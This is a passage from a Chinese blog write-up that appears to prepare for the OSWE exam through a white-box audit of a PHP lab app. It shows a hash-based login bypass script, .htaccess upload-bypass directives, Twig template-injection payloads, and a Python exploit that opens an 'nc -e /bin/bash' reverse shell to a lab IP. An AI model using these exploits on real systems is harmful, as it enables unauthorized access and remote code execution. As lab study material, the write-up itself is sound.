</span><br><span class="line">             $_SESSION[<span class="string">'login_user'</span>] = $myusername;</span><br><span class="line">	     <span class="keyword">include</span>(<span class="string">'user_log_update.php'</span>);</span><br><span class="line">             header(<span class="string">"location: welcome.php"</span>);   </span><br><span class="line">   </span><br><span class="line">          &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">   </span><br><span class="line">             $error = <span class="string">"Your Login Name or Password is invalid"</span>;</span><br><span class="line">   </span><br><span class="line">          &#125; </span><br><span class="line">   </span><br><span class="line">      &#125;</span><br><span class="line">   </span><br><span class="line">   &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>注意查询语句<code>$sql = &quot;SELECT id FROM users WHERE username = &#39;$myusername&#39; and SHA1(CONCAT(password, &#39;$passtoken&#39;))=&#39;$mypassword&#39;&quot;;</code>，我们在开始利用二阶忙注已经获取用户名和密码的hash，其中密码hash破解起来非常困难，在这里可以看到只要满足查询条件，即可登录用户成功。<code>$mypassword</code>和<code>$passtoken</code>都是我们可以控制的，查询语句中的<code>password</code>我们已经通过注入获取到，查询语句的条件我们都可以让其满足，从而可以登录成功。</p>
<p>利用代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gen_hash</span><span class="params">(sha1password, token)</span>:</span></span><br><span class="line">    m = hashlib.sha1()</span><br><span class="line">    m.update(sha1password + token)</span><br><span class="line">    <span class="keyword">return</span> m.hexdigest()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">(ip, username, password)</span>:</span></span><br><span class="line">    target = <span class="string">"http://%s//login.php"</span> % (ip)</span><br><span class="line">    token = <span class="string">'token'</span></span><br><span class="line">    password = gen_hash(password, token)</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">"form_password_hidden"</span>: password,</span><br><span class="line">        <span class="string">"username"</span>: username,</span><br><span class="line">        <span class="string">"password"</span>: <span class="string">""</span>,</span><br><span class="line">        <span class="string">"submit"</span>: <span class="string">'submit'</span>,</span><br><span class="line">        <span class="string">"token"</span>: token</span><br><span class="line">    &#125;</span><br><span class="line">    s = requests.Session()</span><br><span class="line">    r = s.post(target, data=data)</span><br><span class="line">    res = r.text</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'welcome'</span> <span class="keyword">in</span> res <span class="keyword">or</span> <span class="string">'Welcome'</span> <span class="keyword">in</span> res:</span><br><span class="line">        print(<span class="string">"(+) Login Successful"</span>)</span><br><span class="line">        print(<span class="string">"(+) Login using hash was successful"</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">"(-) Login Failed"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) != <span class="number">4</span>:</span><br><span class="line">        print(<span class="string">"(+) usage: %s &lt;target&gt; &lt;username&gt; &lt;hash&gt;"</span> % sys.argv[<span class="number">0</span>])</span><br><span class="line">        print(<span class="string">'(+) eg: %s 192.168.1.100 test 6def5b004ce10c7667f82c776b1a0c75b599cdd8'</span> % sys.argv[<span class="number">0</span>])</span><br><span class="line">        sys.exit(<span class="number">-1</span>)</span><br><span class="line"></span><br><span class="line">    ip = sys.argv[<span class="number">1</span>]</span><br><span class="line">    username = sys.argv[<span class="number">2</span>]</span><br><span class="line">    password = sys.argv[<span class="number">3</span>]</span><br><span class="line">    login(ip, username, password)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p>登录<code>admin</code>后台之后，发现存在上传点，查看上传的实现代码<code>trouble1_whiteBox/upload.php</code>如下所示：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_REQUEST[<span class="string">'upload'</span>]))&#123;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>($_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>])</span><br><span class="line">	&#123;</span><br><span class="line">		header(<span class="string">"Location: welcome.php"</span>);</span><br><span class="line">		<span class="keyword">die</span>();	</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	$notAllowed = <span class="keyword">array</span>(<span class="string">'php'</span>,<span class="string">'php1'</span>,<span class="string">'php2'</span>,<span class="string">'php3'</span>,<span class="string">'php4'</span>,<span class="string">'php5'</span>,<span class="string">'php6'</span>,<span class="string">'php7'</span>,<span class="string">'phtml'</span>,<span class="string">'exe'</span>,<span class="string">'html'</span>,<span class="string">'cgi'</span>,<span class="string">'asp'</span>,<span class="string">'gif'</span>,<span class="string">'jpeg'</span>,<span class="string">'png'</span>,<span class="string">'vb'</span>,<span class="string">'inf'</span>);</span><br><span class="line"></span><br><span class="line">	$splitFileName = explode(<span class="string">"."</span>, $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]);</span><br><span class="line"></span><br><span class="line">	$fileExtension = end($splitFileName);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(in_array($fileExtension, $notAllowed))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"Please upload a TEXT file"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"Name: "</span>.$_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;br&gt;Size: "</span>.$_FILES[<span class="string">"file"</span>][<span class="string">"size"</span>];</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;br&gt;Temp File: "</span>.$_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>];</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;br&gt;Type: "</span>.$_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>];</span><br><span class="line"></span><br><span class="line">		move_uploaded_file($_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>], <span class="string">"uploads/"</span>.$_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>发现存在黑名单，显然可以绕过，如上传<code>*.Php</code>这样的文件即可，但是<code>uploads</code>目录下存在<code>.htaccess</code>文件，内容如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">order deny, allow </span><br><span class="line">deny from all</span><br></pre></td></tr></table></figure>

<p>如果可以上传文件覆盖<code>.htaccess</code>文件为如下内容：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SetHandler application/x-httpd-php</span><br></pre></td></tr></table></figure>

<p>那么上传的任意文件都会被当作<code>php</code>脚本来执行。这样就可以绕过目录<code>php</code>代码执行的限制。</p>
<p>或者指定解析某种类型后缀的文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .abc</span><br></pre></td></tr></table></figure>

<p>上面所示，任何以<code>abc</code>为后缀的文件都会当作<code>php</code>解析。</p>
<p>为了使目录下的<code>.htaccess</code>文件起作用，需要设置<code>apache2.conf</code>。<code>.htaccess</code>不起作用的原因 ，通常是<code>apache2.conf</code>文件的<code>AllowOverride</code>设置有问题， 可能是<code>AllowOverride None</code> 造成的。把这个改为<code>AllowOverride All</code>即可。</p>
<p>除了有上传点，可以发现<code>username</code>那里存在模板注入，通过阅读源码<code>trouble1_whiteBox/admin/welcome.php</code>，部分代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">  &lt;div style=<span class="string">"padding:10px;"</span>&gt;</span><br><span class="line">         &lt;form method=<span class="string">'POST'</span> action=<span class="string">''</span>&gt;</span><br><span class="line">             &lt;div class="form-group"&gt;</span><br><span class="line">                 &lt;label&gt;Search username&lt;/label&gt;&lt;br&gt;</span><br><span class="line">                 &lt;input style="width:200px" class="form-control" width="50%" placeholder="Enter username" name="name"&gt;</span><br><span class="line">                 &lt;br&gt;&lt;br&gt;</span><br><span class="line">                 &lt;div align=<span class="string">"left"</span> &gt;</span><br><span class="line">                     &lt;button class="btn btn-default" type="submit" name='submit'&gt;Submit Button&lt;/button&gt;</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span> (<span class="string">'vendor/twig.php'</span>)<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>twig.php</code>看到这个文件，怀疑存在<code>twig</code>模板注入。查看<code>twig.php</code>具体实现如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">                <span class="keyword">if</span> (<span class="keyword">isset</span>($_REQUEST[<span class="string">'submit'</span>])) &#123;</span><br><span class="line">                    $name=$_POST[<span class="string">'name'</span>];</span><br><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">'/^[A-Za-z]&#123;1&#125;[A-Za-z0-9]&#123;0,31&#125;$/'</span>, $name))&#123; </span><br><span class="line">		<span class="comment">// include and register Twig auto-loader</span></span><br><span class="line">                    <span class="keyword">include</span> <span class="string">'vendor/twig/twig/lib/Twig/Autoloader.php'</span>;</span><br><span class="line">                    Twig_Autoloader::register();</span><br><span class="line">                    <span class="keyword">try</span> &#123;</span><br><span class="line">                          <span class="comment">// specify where to look for templates</span></span><br><span class="line">                              $loader = <span class="keyword">new</span> Twig_Loader_String();</span><br><span class="line">  </span><br><span class="line">                          <span class="comment">// initialize Twig environment</span></span><br><span class="line">                              $twig = <span class="keyword">new</span> Twig_Environment($loader);</span><br><span class="line">                         <span class="comment">// set template variables</span></span><br><span class="line">                         <span class="comment">// render template</span></span><br><span class="line">                            $result= $twig-&gt;render($name);</span><br><span class="line">                            <span class="keyword">echo</span> <span class="string">"&lt;h2&gt;Hello "</span>. @$result .<span class="string">"&lt;/h2&gt;"</span>;</span><br><span class="line">  </span><br><span class="line">                    &#125; <span class="keyword">catch</span> (<span class="keyword">Exception</span> $e) &#123;</span><br><span class="line">                          <span class="keyword">die</span> (<span class="string">'ERROR: '</span> . $e-&gt;getMessage());</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line">                    </span><br><span class="line">            <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里存在模板注入，可以简单测试，在<code>username</code>里输入<code>49</code>会得到结果<code>49</code>，如下所示：</p>
<p><img src="/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/twig.png" alt="label"></p>
<p>这样就证明存在模板注入，查找<code>twig</code>模板注入<code>payload</code>，执行如下<code>payload</code>：</p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="template-variable">&#123;&#123;_self.env.registerUndefinedFilterCallback("exec")&#125;&#125;</span><span class="template-variable">&#123;&#123;_self.env.getFilter("id")&#125;&#125;</span></span><br></pre></td></tr></table></figure>

<p>显示用户的ID，以及所属群组的ID，要获取反弹<code>shell</code>只需替换如下<code>payload</code>中的<code>reverse shell payload</code>即可：</p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="template-variable">&#123;&#123;_self.env.registerUndefinedFilterCallback("exec")&#125;<span class="template-variable">&#123;&#123;_self.env.getFilter("reverse shell payload")&#125;&#125;</span></span></span><br></pre></td></tr></table></figure>

<p>反弹shell的代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">admin_login</span><span class="params">(ip, username, password)</span>:</span></span><br><span class="line">    target = <span class="string">"http://%s/admin/index.php"</span> % (ip)</span><br><span class="line">    token = <span class="string">'token'</span></span><br><span class="line">    password = gen_hash(password, token)</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">"form_password_hidden"</span>: password,</span><br><span class="line">        <span class="string">"username"</span>: username,</span><br><span class="line">        <span class="string">"password"</span>: <span class="string">""</span>,</span><br><span class="line">        <span class="string">"submit"</span>: <span class="string">'submit'</span>,</span><br><span class="line">        <span class="string">"token"</span>: token</span><br><span class="line">    &#125;</span><br><span class="line">    s = requests.Session()</span><br><span class="line">    r = s.post(target, data=data)</span><br><span class="line">    res = r.text</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'welcome'</span> <span class="keyword">in</span> res <span class="keyword">or</span> <span class="string">'Welcome'</span> <span class="keyword">in</span> res:</span><br><span class="line">        print(<span class="string">"(+) Login Successful"</span>)</span><br><span class="line">        print(<span class="string">"(+) Login using hash was successful"</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">"(-) Login Failed"</span>)</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"(+) Getting reverse shell"</span>)</span><br><span class="line">    target = <span class="string">"http://%s/admin/welcome.php"</span> % (ip)</span><br><span class="line">    payload = <span class="string">'&#123;&#123;_self.env.registerUndefinedFilterCallback("exec")&#125;&#125;&#123;&#123;_self.env.getFilter("nc %s %s -e '</span> \</span><br><span class="line">              <span class="string">'/bin/bash")&#125;&#125;'</span> % (<span class="string">"192.168.13.4"</span>, <span class="string">"4444"</span>)</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">"name"</span>: payload,</span><br><span class="line">        <span class="string">"submit"</span>: <span class="string">'submit'</span>,</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    _ = s.post(target, data=data)</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>n0maj1o24
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://n0maj1o24.github.io/2021/06/15/WBP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="WBP代码审计">https://n0maj1o24.github.io/2021/06/15/WBP代码审计/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-ND</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/PHP/" rel="tag"># PHP</a>
              <a href="/tags/OSWE/" rel="tag"># OSWE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/06/08/Laravel-RCE1-7-POP%E9%93%BE%E5%88%86%E6%9E%90/" rel="prev" title="Laravel RCE1-7 POP链分析">
      <i class="fa fa-chevron-left"></i> Laravel RCE1-7 POP链分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/06/20/OSWE-Lab-Sqeakr-Writeup/" rel="next" title="OSWE Lab Sqeakr Writeup">
      OSWE Lab Sqeakr Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="n0maj1o24"
      src="/images/avatar.jpeg">
  <p class="site-author-name" itemprop="name">n0maj1o24</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/n0maj1o24" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;n0maj1o24" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-nd.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">n0maj1o24</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'YxcX5Cznyp28BYsOhkgW4VH2-gzGzoHsz',
      appKey     : 'DNYhYDu0OfL5c9gaMjQ1vbNC',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
